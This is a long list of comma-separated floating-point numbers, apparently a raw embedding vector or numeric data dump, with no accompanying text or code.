0.054602205753326416, 0.02504133991897106, 0.006477114278823137, -0.03565697371959686, -0.06731994450092316, -0.0318731851875782, -0.015529308468103409, 0.017276683822274208, 0.014005281962454319, 0.008073401637375355, 0.0024322024546563625, -0.00362941762432456, 0.017027059569954872, -0.016895677894353867, -0.03899407014250755, -0.045169003307819366, -0.00248803966678679, 0.01156158372759819, -0.012941090390086174, -0.014622775837779045, 0.010891537182033062, -0.011410494334995747, -0.016698606312274933, -0.018945232033729553, -0.025737661868333817, 0.01697450689971447, 0.12318341434001923, -0.010346303693950176, -0.016724882647395134, -0.030244052410125732, 0.023044338449835777, 0.003918457310646772, -0.0026489822193980217, -0.004884112160652876, -0.00248803966678679, -0.059752367436885834, -0.038836412131786346, -0.028115669265389442, -0.04180563613772392, 0.004558942746371031, 0.028641195967793465, -0.02002255991101265, 0.027721524238586426, -0.0007295786053873599, -0.02853609062731266, -0.00130478385835886, -0.009643412195146084, -0.0170927494764328, -0.02971852570772171, 0.0194838959723711, -0.012133093550801277, -0.019680967554450035, -0.004529381636530161, -0.02155972644686699, 0.046114951372146606, 0.011627274565398693, 0.014622775837779045, -0.05638899654150009, -0.036891963332891464, 0.019024061039090157, 0.007600427605211735, 0.02203270047903061, 0.015503032132983208, -0.028877682983875275, -0.024712884798645973, 0.0018771151080727577, -0.010444839484989643, -0.0022416990250349045, 0.0058596208691596985, -0.000010469473636476323, 0.0030102815944701433, 0.03226732835173607, 0.0018771151080727577, 0.03231988102197647, 0.04711345210671425, -0.012652050703763962, -0.015292822383344173, -0.021402068436145782, -0.04382891207933426, 0.0085332365706563, -0.002612852258607745, -0.006240627728402615, -0.032398711889982224, -0.0004889860283583403, 0.030743302777409554, -0.019983146339654922, 0.02037729136645794, 0.01759199984371662, -0.01747375726699829, 0.004223919473588467, -0.019654691219329834, -0.051054902374744415, 0.014241768978536129, -0.015411064960062504, 0.014951230026781559, -0.0048512667417526245, -0.02555372752249241, 0.005554158706218004, 0.0006774365319870412, -0.006904104724526405, -0.008270474150776863, 0.02250567264854908, 0.009131023660302162, 0.029823631048202515, -0.009512030519545078, 0.0019657977391034365, -0.011614136397838593, 0.008020848967134953, -0.017486894503235817, 0.007291680667549372, -0.03796929121017456, 0.04766525700688362, -0.010241198353469372, -0.016159940510988235, -0.030953511595726013, 0.04981991648674011, -0.007370509672909975, 0.0004117992939427495, -0.003029988845810294, -0.04388146474957466, -0.008125954307615757, -0.010701034218072891, 0.02735365554690361, -0.028378432616591454, 0.004358585458248854, 0.025750799104571342, 0.002911745337769389, -0.022492535412311554, -0.014859262853860855, 0.026604780927300453, 0.01732923649251461, -0.027958011254668236, 0.0015691893640905619, -0.018945232033729553, -0.00016515082097612321, -0.03957214578986168, 0.028614919632673264, 0.01283598504960537, -0.004292894620448351, -0.00987989827990532, -0.029613420367240906, -0.04193701595067978, -0.02832587994635105, 0.02141520567238331, -0.012323597446084023, -0.04033416137099266, 0.005357086192816496, 0.019680967554450035, -0.026723023504018784, 0.008020848967134953, -0.01248125545680523, 0.00004488016929826699, -0.029587144032120705, 0.01650153286755085, -0.007620134856551886, -0.02803684026002884, 0.02247939631342888, 0.02785290591418743, 0.025882180780172348, -0.016370151191949844, -0.01969410665333271, -0.007685825694352388, 0.05234244093298912, -0.034763578325510025, -0.000806354742962867, -0.02330710180103779, 0.01564755290746689, -0.00956458318978548, -0.009603997692465782, 0.011673257686197758, -0.0035604422446340322, 0.01912916637957096, 0.018853263929486275, 0.006227489560842514, -0.012888537719845772, -0.008073401637375355, -0.034054119139909744, 0.04180563613772392, 0.019523311406373978, -0.010740448720753193, 0.01818321831524372, 0.011863761581480503, -0.00362284854054451, -0.0015412707580253482, 0.002859192667528987, -0.004903819411993027, -0.02392459474503994, 0.028483537957072258, -0.0030480539426207542, -0.002980720717459917, -0.05352487787604332, -0.00561984907835722, 0.004230488557368517, 0.0012694749748334289, 0.00405969237908721, 0.02513330616056919, -0.008467545732855797, 0.007889467291533947, -0.007363940589129925, -0.013262975960969925, 0.025593141093850136, 0.0063391635194420815, -0.028115669265389442, 0.03825833275914192, 0.005636272020637989, -0.01203455775976181, -0.019628414884209633, -0.0135454460978508, 0.012527238577604294, -0.017276683822274208, -0.02368810772895813, 0.039204277098178864, -0.00007749463111395016, -0.008125954307615757, -0.00566254835575819, -0.03657664731144905, -0.006401570048183203, -0.025356654077768326, -0.008270474150776863, -0.01801242120563984, 0.01650153286755085, -0.007652980275452137, 0.0030792569741606712, -0.021388929337263107, 0.017027059569954872, 0.003793644718825817, -0.01082584634423256, 0.012487824074923992, -0.015030059032142162, 0.005754515528678894, -0.009781362488865852, -0.04908417910337448, -0.0006437699776142836, -0.011857192032039165, 0.015450479462742805, 0.01131195854395628, -0.006414708215743303, -0.02661791816353798, 0.015805210918188095, -0.008336164988577366, 0.026985786855220795, 0.035473041236400604, 0.0109243830665946, -0.002770510269328952, 0.03652409464120865, -0.07741005718708038, 0.018682468682527542, -0.01403155829757452, -0.02307061478495598, -0.03066447377204895, -0.03991374000906944, 0.04435443878173828, -0.029429486021399498, -0.03326582908630371, 0.01249439362436533, 0.004237057641148567, 0.030769577249884605, -0.018695605918765068, 0.0135585842654109, 0.004026846960186958, -0.03899407014250755, 0.028115669265389442, -0.012369580566883087, 0.007659549359232187, 0.009695964865386486, 0.020508673042058945, -0.013939591124653816, 0.0008679399034008384, 0.04143776744604111, -0.001595465699210763, 0.049662258476018906, 0.024975648149847984, -0.002442056080326438, -0.012027988210320473, 0.0027655833400785923, 0.0007423062343150377, -0.035473041236400604, 0.004013708792626858, -0.026276325806975365, -0.023162581026554108, -0.016041697934269905, 0.016921954229474068, 0.0008843626128509641, 0.012934521771967411, -0.013118456117808819, -0.016488395631313324, 0.00589903537184, -0.041385214775800705, 0.06469231843948364, -0.0366029217839241, 0.01898464560508728, -0.02579021453857422, -0.038363438099622726, 0.006936950143426657, 0.0031860044691711664, -0.022558225318789482, 0.011357941664755344, 0.015923453494906425, 0.009735379368066788, 0.04317200556397438, -0.027064615860581398, 0.019864901900291443, 0.00879599992185831, -0.008467545732855797, 0.017644552513957024, -0.0021907887421548367, -0.029061617329716682, -0.0424099899828434, 0.03465847298502922, -0.004430845379829407, -0.058858972042798996, 0.00654280511662364, 0.05828089267015457, 0.024647194892168045, -0.02921927534043789, 0.03318700194358826, -0.04711345210671425, 0.010195214301347733, -0.03200456500053406, 0.011456478387117386, 0.016869401559233665, 0.02463405579328537, 0.026539089158177376, 0.029087893664836884, -0.005678970832377672, 0.044669754803180695, -0.027406208217144012, 0.018380289897322655, 0.005284826271235943, -0.03237243369221687, 0.0000032973709949146723, 0.029376933351159096, 0.013492893427610397, 0.012586359865963459, -0.0026243480388075113, -0.03683941066265106, 0.009400355629622936, -0.031952012330293655, -0.0006031238008290529, -0.001955944113433361, 0.03944076597690582, 0.008822276256978512, 0.022663330659270287, 0.007107746321707964, 0.017815349623560905, 0.02165169268846512, -0.018695605918765068, -0.019444482401013374, -0.014859262853860855, -0.010103247128427029, -0.000405435508582741, 0.0008346839458681643, -0.024791713804006577, -0.03253009170293808, -0.023201996460556984, -0.011344803497195244, -0.006138806696981192, -0.012441840954124928, 0.04924183711409569, -0.020574362948536873, -0.03350231796503067, -0.022558225318789482, -0.023464759811758995, -0.018813850358128548, -0.00164473382756114, 0.016081111505627632, -0.03510517254471779, -0.009971865452826023, 0.0366029217839241, -0.006598642561584711, -0.0235435888171196, 0.018669329583644867, 0.0016882539493963122, -0.05560070648789406, -0.02584276720881462, 0.017867902293801308, -0.003511174116283655, 0.011495892889797688, 0.0067201703786849976, -0.03210967034101486, -0.027143444865942, 0.015358513221144676, 0.012652050703763962, 0.016370151191949844, 0.011036057025194168, 0.009636842645704746, -0.024029700085520744, 0.016199355944991112, 0.03852109611034393, 0.021494034677743912, 0.004154944326728582, -0.003125240560621023, 0.036944516003131866, 0.0076661184430122375, 0.001822920166887343, 0.02167796902358532, -0.052473824471235275, 0.007383647840470076, -0.036865685135126114, -0.02673616260290146, 0.0036195639986544847, 0.052710309624671936, 0.020127665251493454, -0.0007020705961622298, 0.0044801137410104275, -0.016067974269390106, 0.023674970492720604, 0.026841267943382263, 0.019799211993813515, -0.012264475226402283, -0.024200497195124626, -0.0007402533665299416, 0.011758656240999699, -0.007331095170229673, -0.021507173776626587, 0.04813823103904724, 0.004286325536668301, -0.0063950009644031525, 0.01133823487907648, 0.014346874319016933, 0.0022219917736947536, 0.014084110967814922, -0.02803684026002884, -0.03513144701719284, -0.007331095170229673, -0.023977147415280342, -0.02286040410399437, 0.024673471227288246, -0.013341804966330528, 0.011364511214196682, -0.04819078370928764, -0.00029663508757948875, -0.02165169268846512, 0.044012848287820816, -0.007580720353871584, 0.025172719731926918, 0.0006560870097018778, -0.00430931756272912, -0.012172508053481579, 0.020745160058140755, 0.03444826230406761, 0.03731238469481468, -0.006424561608582735, 0.024200497195124626, 0.00947918463498354, 0.03602484241127968, -0.02525154873728752, 0.01954958774149418, 0.017224131152033806, -0.007107746321707964, 0.019497035071253777, 0.022702746093273163, 0.02113930508494377, -0.016632914543151855, -0.017289822921156883, -0.005035201087594032, -0.005908888764679432, -0.0071931444108486176, 0.028220774605870247, -0.03752259537577629, -0.010497392155230045, -0.01723727025091648, 0.03605112060904503, -0.020810849964618683, 0.019418206065893173, -0.019680967554450035, -0.021073613315820694, 0.011449908837676048, -0.01661977730691433, 0.014662190340459347, -0.0002529096382204443, 0.010182076133787632, 0.031032340601086617, -0.004388146568089724, -0.01475415751338005, 0.027931734919548035, 0.010609067045152187, -0.0008925739675760269, -0.0026112098712474108, 0.022137805819511414, -0.0004062566440552473, -0.004966225475072861, -0.006132237613201141, 0.018143802881240845, 0.024975648149847984, -0.017736520618200302, -0.020810849964618683, 0.031925737857818604, -0.0025734377559274435, 0.004693608731031418, -0.00949232280254364, 0.007606996688991785, 0.007541305851191282, -0.006733308546245098, 0.001572473905980587, -0.017197854816913605, 0.0015815063379704952, 0.0075938585214316845, -0.014215492643415928, 0.009295250289142132, 0.014793572016060352, 0.039020344614982605, -0.029902460053563118, 0.0159365925937891, 0.015266546048223972, -0.0006774365319870412, -0.023766936734318733, -0.00044792925473302603, 0.020311599597334862, -0.003698393004015088, 0.008933951146900654, 0.020127665251493454, -0.016659190878272057, 0.01789417862892151, -0.013138162903487682, -0.003882327117025852, -0.017434341832995415, -0.028168221935629845, 0.027537589892745018, 0.0008695821743458509, 0.0040169935673475266, -0.025566864758729935, -0.002855908125638962, 0.016081111505627632, -0.009958727285265923, -0.0009886467596516013, 0.03153159096837044, 0.0049136728048324585, 0.015253407880663872, 0.008421562612056732, 0.011259405873715878, 0.04509017616510391, -0.0017342375358566642, 0.010175507515668869, 0.01836715266108513, -0.040202777832746506, 0.006174936890602112, 0.023530449718236923, -0.059279393404722214, 0.014110387302935123, 0.00796829629689455, 0.017854763194918633, 0.00790917407721281, -0.032451264560222626, -0.0020610494539141655, -0.017145302146673203, -0.024528950452804565, 0.0023172434885054827, 0.05470731109380722, 0.03389646112918854, -0.018327737227082253, -0.018406566232442856, 0.026092391461133957, 0.023845765739679337, -0.01792045496404171, -0.02673616260290146, 0.004493251908570528, 0.011036057025194168, 0.008750016801059246, -0.0008605496841482818, 0.022400567308068275, -0.024384431540966034, -0.00427975645288825, -0.011364511214196682, 0.013492893427610397, 0.022348016500473022, 0.03563069924712181, -0.055548153817653656, 0.011646981351077557, 0.018682468682527542, 0.01635701395571232, -0.010963797569274902, 0.0018787573790177703, 0.04080713540315628, 0.07231245189905167, -0.017119025811553, -0.017119025811553, -0.006007425021380186, 0.002824705094099045, -0.020889678969979286, 0.019378790631890297, 0.02853609062731266, -0.010582790710031986, -0.018235770985484123, -0.026105530560016632, 0.0483221635222435, 0.0029659403953701258, 0.013992143794894218, -0.005005639977753162, -0.011114886030554771, 0.01219878438860178, -0.0008215457783080637, -0.013729380443692207, 0.03728610649704933, 0.02046925760805607, -0.022755298763513565, 0.02667047083377838, 0.02761641889810562, -0.02345162071287632, -0.00838214810937643, -0.0025964295491576195, -0.049425769597291946, -0.0021612278651446104, 0.003994001541286707, 0.0021431627683341503, -0.01576579548418522, -0.02409539185464382, 0.03379135578870773, -0.009439770132303238, 0.01640956662595272, 0.006818706635385752, 0.008388716727495193, 0.0012604425428435206, -0.0041812206618487835, -0.012119955383241177, -0.007088039070367813, -0.003225418971851468, -0.03704962134361267, 0.02389831840991974, 0.022545088082551956, 0.025947872549295425, -0.001967439893633127, 0.033843908458948135, -0.008730309084057808, -0.00012809709005523473, -0.011443340219557285, -0.007994572632014751, -0.013768794946372509, 0.001416458166204393, -0.03226732835173607, 0.012678327038884163, 0.0017785788513720036, -0.014832986518740654, -0.0067858612164855, 0.010970366187393665, -0.017119025811553, 0.0002623526961542666, -0.014701604843139648, -0.031952012330293655, -0.02560628019273281, -0.05801812931895256, 0.004013708792626858, -0.0032812561839818954, -0.006555943284183741, 0.0029396640602499247, 0.011128024198114872, 0.018406566232442856, 0.0030841839034110308, -0.02215094305574894, 0.00362284854054451, 0.009912744164466858, 0.002972509479150176, 0.009452908299863338, 0.009039056487381458, -0.015713242813944817, 0.019799211993813515, -0.0009853622177615762, 0.02685440517961979, -0.015634413808584213, 0.01638329029083252, -0.030138947069644928, 0.015082611702382565, 0.001244019833393395, 0.030007565394043922, 0.020101388916373253, -0.03888896480202675, 0.015608137473464012, -0.014478255994617939, 0.00811938475817442, 0.00021103174367453903, -0.0329505130648613, -0.012540376745164394, 0.010326595976948738, -0.0060402704402804375, 0.002637486206367612, 0.016133664175868034, -0.046351440250873566, 0.004220634698867798, -0.01219878438860178, -0.009249267168343067, -0.0019657977391034365, 0.00790917407721281, 0.0040793996304273605, 0.017171578481793404, -0.02338593080639839, 0.025409206748008728, -0.004861120600253344, 0.017907315865159035, 0.004325740039348602, -0.01718471758067608, 0.009354372508823872, 0.03140021115541458, -0.04740249365568161, 0.028430985286831856, 0.006345732603222132, 0.014215492643415928, 0.02042984403669834, -0.026867544278502464, -0.0030102815944701433, -0.04766525700688362, 0.04030788317322731, 0.00794201996177435, -0.010779863223433495, 0.01219878438860178, -0.00790917407721281, -0.02856236696243286, 0.018564224243164062, -0.0010182076366618276, -0.022807851433753967, 0.052657756954431534, -0.0025800068397074938, -0.004115529824048281, -0.014832986518740654, 0.020955370739102364, -0.011430202051997185, 0.011909744702279568, -0.020101388916373253, -0.0029413062147796154, 0.02276843599975109, -0.023412207141518593, -0.0062767574563622475, -0.022492535412311554, -0.008349303156137466, -0.021047336980700493, 0.03752259537577629, -0.022045837715268135, 0.029298104345798492, 0.002808282384648919, -0.0036392712499946356, 0.010444839484989643, 0.03226732835173607, 0.0004323276807554066, -0.030138947069644928, -0.00030936268740333617, -0.03859992325305939, -0.001983862603083253, -0.003067761193960905, -0.043461043387651443, -0.012415564619004726, -0.010247766971588135, -0.04816450551152229, -0.024003423750400543, -0.010628773830831051, -0.0006614244193769991, 0.004145090468227863, -0.007646411191672087, 0.011049195192754269, -0.015949729830026627, -0.04356614872813225, 0.006506675388664007, 0.026131806895136833, -0.0039907172322273254, 0.017289822921156883, -0.011390787549316883, -0.019181719049811363, -0.026959510520100594, 0.027931734919548035, -0.015976006165146828, -0.009262405335903168, -0.004519528243690729, -0.015752658247947693, -0.0005998392589390278, -0.02161227911710739, -0.030533092096447945, 0.007042055483907461, 0.0009738663211464882, -0.001436986611224711, 0.01836715266108513, 0.024528950452804565, -0.016921954229474068, 0.018708745017647743, 0.0055607277899980545, 0.00181470881216228, -0.007554444018751383, -0.011837485246360302, 0.00362941762432456, -0.013926452957093716, 0.021296963095664978, 0.02212466672062874, -0.00882884580641985, 0.0031580859795212746, 0.044696033000946045, -0.013768794946372509, -0.007462476845830679, -0.008040555752813816, 0.009722241200506687, 0.003067761193960905, -0.0005990181234665215, -0.0013745803153142333, 0.05210595577955246, -0.006490252446383238, -0.03234615921974182, -0.0040169935673475266, -0.0010198499076068401, -0.016843125224113464, 0.012527238577604294, 0.025120168924331665, -0.008467545732855797, 0.010241198353469372, 0.009820776991546154, 0.011988573707640171, 0.001114280428737402, -0.045142728835344315, -0.0024042839650064707, -0.01037914864718914, -0.017289822921156883, -0.0010880040936172009, 0.00996529683470726, -0.0016742947045713663, -0.03731238469481468, -0.01954958774149418, 0.03090095892548561, 0.03397528827190399, -0.02111302874982357, -0.013952729292213917, -0.010103247128427029, -0.006651195231825113, 0.005143590737134218, 0.008809138089418411, 0.01125283632427454, 0.016199355944991112, 0.0007209567120298743, 0.015437341295182705, 0.02368810772895813, 0.0055607277899980545, -0.013821347616612911, 0.018091250211000443, 0.0176839679479599, -0.03907289728522301, -0.007876329123973846, -0.027747800573706627, -0.02572452276945114, 0.008585789240896702, -0.017197854816913605, -0.0020117813255637884, 0.0012004997115582228, 0.02167796902358532, -0.005547589622437954, 0.0135454460978508, -0.00028411278617568314, 0.028667472302913666, 0.014097249135375023, -0.0448799654841423, -0.04934694245457649, -0.012737449258565903, 0.006165083032101393, 0.004756015259772539, 0.0005632987595163286, -0.002862477209419012, 0.005327525082975626, 0.0009746874566189945, 0.005472044926136732, -0.02898278832435608, -0.040176503360271454, 0.009939020499587059, -0.045615702867507935, -0.04861120507121086, 0.01600228250026703, -0.013729380443692207, 0.00564941018819809, -0.007784361485391855, -0.007501891348510981, 0.0010732236551120877, 0.009847053326666355, -0.028720024973154068, -0.019733520224690437, -0.009590859524905682, -0.03652409464120865, 0.00028205994749441743, 0.001704676658846438, -0.017933592200279236, -0.0012464831816032529, 0.012941090390086174, -0.02619749680161476, 0.007173437159508467, 0.022610777989029884, 0.0074756150133907795, 0.02590845711529255, 0.014110387302935123, -0.03021777607500553, -0.01171267218887806, -0.007836914621293545, 0.02475230023264885, -0.0542343370616436, -0.0014090680051594973, -0.024450121447443962, -0.003217207733541727, -0.014872401021420956, 0.01794673129916191, 0.001906675985082984, 0.033633697777986526, -0.007068331819027662, 0.022242911159992218, -0.001883684191852808, -0.029298104345798492, -0.011318527162075043, 0.009433201514184475, -0.012954228557646275, -0.004404569044709206, 0.03421177715063095, -0.02442384511232376, 0.0033962151501327753, -0.014294321648776531, 0.004535950720310211, 0.03539421036839485, -0.01378193311393261, -0.011042626574635506, 0.017670828849077225, -0.00016145571134984493, 0.008329595439136028, -0.038337159901857376, -0.007462476845830679, -0.008277042768895626, -0.009833915159106255, -0.02643398381769657, -0.024883681908249855, -0.011509031057357788, -0.035998567938804626, 0.034579645842313766, 0.012829416431486607, 0.0013244911096990108, -0.013611136935651302, 0.021861903369426727, -0.005767653696238995, 0.012441840954124928, -0.017105888575315475, -0.01042513269931078, 0.002754087559878826, 0.025658832862973213, 0.018708745017647743, -0.03941448777914047, 0.013453478924930096, -0.012225060723721981, 0.013026488944888115, -0.002499535446986556, -0.007423062343150377, 0.033633697777986526, -0.024226773530244827, 0.007679256610572338, -0.007206282578408718, -0.020653191953897476, -0.004430845379829407, 0.005600141827017069, -0.009512030519545078, -0.002272902289405465, 0.0006774365319870412, -0.0014722953783348203, 0.0008753301226533949, 0.0075938585214316845, 0.02489681914448738, -0.004141806159168482, -0.01614680327475071, -0.006316171959042549, 0.038783859461545944, -0.024699747562408447, -0.029376933351159096, 0.011384217999875546, 0.030349157750606537, -0.02226918749511242, -0.020889678969979286, 0.0014451979659497738, -0.000646643980871886, 0.01933937706053257, 0.0007332737441174686, -0.014885539188981056, 0.0015708316350355744, -0.030822129920125008, 0.014780433848500252, -0.02188817970454693, 0.041595425456762314, -0.005478614009916782, -0.02685440517961979, -0.021494034677743912, -0.001171759911812842, -0.020272186025977135, 0.012770294211804867, 0.0014698320301249623, -0.014688466675579548, -0.0002738485927693546, -0.00454580457881093, -0.04028160870075226, -0.01853794790804386, -0.030480539426207542, -0.010996642522513866, 0.017394928261637688, 0.004158228635787964, -0.026591641828417778, 0.020810849964618683, 0.0135454460978508, -0.013519169762730598, -0.014294321648776531, 0.017053335905075073, -0.004256764892488718, 0.018932092934846878, 0.0015420919517055154, -0.013979005627334118, -0.00906533282250166, -0.026355154812335968, -0.00612895330414176, -0.012757156044244766, 0.0048512667417526245, -0.04356614872813225, 0.019628414884209633, -0.004893965553492308, -0.012809708714485168, 0.005928596016019583, 0.009347802959382534, -0.009413493797183037, -0.008349303156137466, 0.006260334979742765, -0.0018442696891725063, -0.004838128574192524, 0.002617778955027461, 0.02877257764339447, 0.05912173539400101, -0.018735021352767944, -0.0007377899601124227, -0.024673471227288246, 0.005981148686259985, 0.008750016801059246, -0.014097249135375023, -0.006316171959042549, -0.015371651388704777, -0.005058192647993565, 0.003925026394426823, -0.008079970255494118, -0.007935450412333012, 0.021244410425424576, 0.013348373584449291, 0.010884968563914299, 0.002194073284044862, -0.00996529683470726, 0.03045426309108734, -0.019260548055171967, 0.008211351931095123, -0.0012694749748334289, -0.0008116921526379883, -0.019418206065893173, 0.022045837715268135, -0.027432484552264214, -0.015411064960062504, -0.02085026539862156, -0.02508075349032879, -0.017289822921156883, -0.0038002138026058674, -0.01380820944905281, -0.022637054324150085, 0.0013285967288538814, -0.0016250265762209892, -0.0021645124070346355, 0.02850981429219246, -0.016304461285471916, -0.00634244829416275, -0.007771223317831755, -0.0014607994817197323, -0.034553367644548416, -0.013926452957093716, -0.013979005627334118, -0.001967439893633127, -0.008993072435259819, 0.026223773136734962, 0.0003218849888071418, -0.012592929415404797, 0.024883681908249855, -0.004046554211527109, -0.013519169762730598, 0.01922113262116909, 0.0030283466912806034, 0.00033912883372977376, 0.030480539426207542, 0.006030417047441006, -0.021783074364066124, -0.0024272757582366467, 0.0003623258962761611, -0.0085332365706563, 0.012665188871324062, -0.017841625958681107, 0.008585789240896702, -0.004677186254411936, 0.007652980275452137, 0.001982220448553562, 0.010096678510308266, -0.025159582495689392, 0.03560442104935646, 0.022781575098633766, 0.007344233337789774, 0.003314101602882147, -0.007101177237927914, 0.004338878206908703, 0.03581463173031807, -0.001667725620791316, 0.024239910766482353, -0.024266187101602554, -0.013243268243968487, 0.03578835725784302, 0.03087468259036541, -0.010464547201991081, 0.019326237961649895, -0.020587502047419548, 0.009525168687105179, -0.016908815130591393, -0.012343304231762886, -0.0009845411404967308, -0.007659549359232187, 0.005925311706960201, -0.009124454110860825, 0.025277825072407722, -0.016330737620592117, 0.024226773530244827, 0.019970007240772247, 0.02477857656776905, -0.01742120459675789, -0.014846124686300755, -0.003527596825733781, -0.003747661132365465, 0.0015765795251354575, -0.006280042231082916, -0.0053242407739162445, -0.02238743007183075, 0.014951230026781559, -0.009794500656425953, 0.026394570246338844, -0.022755298763513565, 0.0030119239818304777, -0.04485368728637695, -0.03326582908630371, 0.009249267168343067, -0.023609278723597527, -0.013302390463650227, 0.024949371814727783, 0.01173894852399826, -0.0035637267865240574, -0.0170664731413126, -0.032188501209020615, -0.02560628019273281, -0.025093892589211464, 0.04506389796733856, -0.007107746321707964, 0.010208352468907833, -0.003067761193960905, 0.012809708714485168, -0.03796929121017456, 0.020351015031337738, 0.008763154968619347, 0.045379213988780975, 0.004440699238330126, 0.015056335367262363, -0.015949729830026627, 0.018380289897322655, -0.035972289741039276, 0.011719241738319397, 0.013019919395446777, -0.018262047320604324, 0.011936021037399769, -0.007180006243288517, 0.007212851662188768, 0.006792430300265551, 0.0006778471288271248, 0.005403069779276848, 0.004391430877149105, -0.0011832558084279299, 0.015161440707743168, 0.009695964865386486, 0.017762796953320503, -0.005780791863799095, -0.0270908921957016, -0.00003369220212334767, 0.029324380680918694, -0.011817777529358864, 0.003117029322311282, 0.02827332727611065, -0.0176576916128397, 0.019168579950928688, -0.004634486977010965, -0.002762298798188567, 0.008881398476660252, 0.009203283116221428, -0.012238198891282082, -0.010891537182033062, 0.03247753903269768, 0.005350517109036446, -0.011706103570759296, -0.014294321648776531, -0.039677251130342484, 0.021717384457588196, 0.0038067828863859177, -0.020745160058140755, 0.02652595192193985, 0.008914243429899216, -0.007160298991948366, -0.02049553394317627, 0.032871685922145844, 0.02288668043911457, -0.018340876325964928, 0.010076970793306828, 0.01742120459675789, 0.017605138942599297, -0.004562227055430412, -0.000058967772929463536, -0.015384788624942303, -0.009630274027585983, 0.0012136378791183233, -0.03841599076986313, 0.025396069511771202, 0.008644911460578442, 0.031032340601086617, -0.009873329661786556, -0.015581861138343811, -0.016107387840747833, -0.01497750636190176, -0.004759299568831921, -0.012093679048120975, -0.009177006781101227, 0.006864690221846104, 0.015095749869942665, -0.01995687000453472, 0.0024256333708763123, 0.009393787011504173, -0.012126524932682514, -0.03108489327132702, 0.004762584343552589, 0.009203283116221428, -0.019983146339654922, -0.0015757584478706121, -0.0019116027979180217, 0.01901092194020748, 0.0058858972042799, 0.01581834815442562, -0.0008942162385210395, 0.020035699009895325, -0.01425490714609623, -0.013374649919569492, 0.00034877719008363783, -0.024923095479607582, -0.034789856523275375, 0.00006969385140109807, 0.007869759574532509, 0.010536806657910347, -0.028641195967793465, 0.02631574124097824, 0.024739161133766174, -0.017276683822274208, -0.0011939306277781725, 0.028825130313634872, -0.02096850797533989, 0.003741092048585415, 0.000015665720638935454, 0.007199713494628668, 0.00972880981862545, -0.03255636990070343, -0.017132164910435677, 0.010182076133787632, -0.005823490675538778, 0.024857405573129654, 0.00181470881216228, 0.007646411191672087, -0.026302602142095566, -0.016567224636673927, -0.006792430300265551, -0.00019368526409380138, 0.01600228250026703, -0.017749657854437828, -0.010714172385632992, 0.013453478924930096, -0.025093892589211464, 0.0003972241538576782, 0.0056855399161577225, -0.006119099445641041, -0.002246625954285264, 0.021835627034306526, -0.007817206904292107, 0.009676257148385048, 0.014846124686300755, -0.015240269713103771, -0.0035144586581736803, -0.00007005309453234076, -0.012934521771967411, 0.017040196806192398, -0.030086394399404526, 0.002801713300868869, 0.01179807074368, -0.005035201087594032, 0.024712884798645973, -0.00016484288789797574, 0.019641553983092308, 0.006033701356500387, 0.007922312244772911, -0.026959510520100594, -0.004907103721052408, -0.014333736151456833, -0.00901934877038002, -0.015962868928909302, 0.009531737305223942, -0.008336164988577366, 0.006431130692362785, 0.05281541496515274, -0.00879599992185831, -0.03436943516135216, 0.009912744164466858, -0.005636272020637989, -0.02314944379031658, -0.007350802421569824, -0.030375434085726738, -0.013210423290729523, 0.009144161827862263, 0.011154300533235073, -0.004900534637272358, -0.026118667796254158, 0.011141162365674973, -0.004414422903209925, -0.0037049620877951384, 0.003718100255355239, -0.021007923409342766, -0.020009422674775124, 0.009420063346624374, 0.033843908458948135, 0.00903248693794012, 0.020272186025977135, -0.015739519149065018, 0.00702234823256731, -0.017460618168115616, -0.0013064261293038726, 0.006352301687002182, 0.0028526235837489367, -0.008815707638859749, -0.005028632003813982, -0.026368293911218643, -0.035972289741039276, 0.002778721507638693, -0.008894536644220352, 0.027274826541543007, 0.006605211645364761, -0.007081469986587763, 0.011719241738319397, 0.01617307960987091, -0.031189998611807823, -0.027721524238586426, -0.03271402791142464, -0.015345375053584576, -0.008822276256978512, 0.011903176084160805, 0.00045573004172183573, 0.013506031595170498, -0.021980147808790207, 0.019615277647972107, 0.009374079294502735, 0.03205711767077446, -0.023162581026554108, 0.01378193311393261, -0.023609278723597527, 0.009236129000782967, -0.0030825415160506964, -0.009899605996906757, 0.0011430202284827828, -0.015778934583067894, 0.006746446713805199, -0.0033042479772120714, 0.0055508739314973354, 0.012803140096366405, 0.017013920471072197, -0.003328882157802582, -0.004529381636530161, -0.008040555752813816, -0.03652409464120865, -0.005064761731773615, 0.01730296015739441, -0.00426661828532815, 0.007994572632014751, 0.005531166680157185, 0.02581649087369442, 0.010937521234154701, -0.00909160915762186, 0.002903534099459648, -0.04519528150558472, 0.008336164988577366, 0.0021645124070346355, -0.012711172923445702, -0.014688466675579548, 0.008730309084057808, -0.004483398050069809, -0.003094037529081106, 0.021599140018224716, 0.005045054480433464, -0.014241768978536129, -0.004880827851593494, 0.019391929730772972, 0.005012209061533213, -0.0020955370273441076, -0.010464547201991081, 0.005035201087594032, 0.015082611702382565, -0.00294294860213995, -0.011857192032039165, 0.004713315982371569, 0.014714743010699749, 0.004191074054688215, -0.007383647840470076, -0.0012251336593180895, -0.010819277726113796, 0.01898464560508728, 0.0005899856332689524, 0.01682998612523079, -0.009196714498102665, 0.025803351774811745, -0.003911888226866722, 0.026749299839138985, 0.014806710183620453, 0.024108529090881348, 0.014346874319016933, -0.001765440683811903, 0.023136304691433907, -0.003095679683610797, -0.01910289004445076, -0.027537589892745018, 0.016448980197310448, 0.003770652925595641, 0.00451624346897006, 0.015240269713103771, 0.010457977652549744, 0.005465475842356682, 0.00518300523981452, -0.018472258001565933, 0.028825130313634872, -0.004010424483567476, -0.002739307004958391, -0.0010945731773972511, 0.009222990833222866, -0.02019335702061653, 0.004654194228351116, 0.005265119019895792, -0.021691108122467995, 0.015989145264029503, -0.015594999305903912, 0.02380635216832161, -0.009518599137663841, 0.0016636198852211237, -0.03888896480202675, -0.03494751453399658, 0.0008326310780830681, -0.01200828142464161, 0.004414422903209925, -0.008073401637375355, 0.013289252296090126, -0.0021201709751039743, 0.018222631886601448, 0.012638912536203861, 0.0035637267865240574, -0.026236912235617638, -0.0008137449622154236, 0.008329595439136028, -0.018340876325964928, 0.010635343380272388, -0.01428118348121643, 0.01647525653243065, 0.017276683822274208, -0.015608137473464012, -0.008690894581377506, -0.00977479387074709, -0.026000425219535828, -0.01248125545680523, -0.01753944717347622, -0.021402068436145782, -0.018735021352767944, -0.014189216308295727, 0.005064761731773615, 0.012205353938043118, -0.0024026415776461363, 0.016540948301553726, -0.001509246532805264, 0.011016350239515305, 0.00002771331310214009, -0.012369580566883087, -0.007114315405488014, 0.003432345110923052, -0.012395856902003288, -0.0068121375516057014, 0.03957214578986168, 0.0126848965883255, 0.016803709790110588, -0.002415779745206237, -0.021520311012864113, 